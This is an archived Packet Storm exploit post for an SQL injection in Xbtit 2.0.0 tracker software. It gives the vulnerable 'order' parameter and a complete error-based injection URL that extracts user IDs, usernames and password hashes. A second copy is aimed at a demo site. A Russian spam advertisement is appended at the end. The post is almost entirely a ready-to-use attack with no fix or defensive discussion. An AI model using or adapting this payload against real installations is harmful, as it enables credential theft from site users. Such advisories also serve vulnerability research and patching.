Xbtit 2.0.0 SQL Injection

2010-03-15T00:00:00
ID PACKETSTORM:87234
Type packetstorm
Reporter Ctacok
Modified 2010-03-15T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Xbtit SQL Injection Vulnerability  
# Date: 14.03.2010  
# Author: Ctacok  
# Software Link: http://xbtit.com/  
# Version: 2.0.0  
# Tested on: Windows XP SP3  
  
####################################################  
# Title : Xbtit SQL Injection Vulnerability #  
# Author : Ctacok #  
# Homepage : http://ctacok.ru/ #  
####################################################  
  
####################################################  
# Vulnerable File :   
/index.php?page=users&order=[SQL]&by=ASC  
  
####################################################  
# ExploiT :   
  
/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC  
  
####################################################  
# Example :   
  
http://demo.xbtit.com/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+btit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC  
_________________________________________________________________   
Устали от СПАМа на рабочем месте? Возьмите решение от NextMail:  
http://www.nextcorp.ru/corp/virt.phtml  
  
  
  
`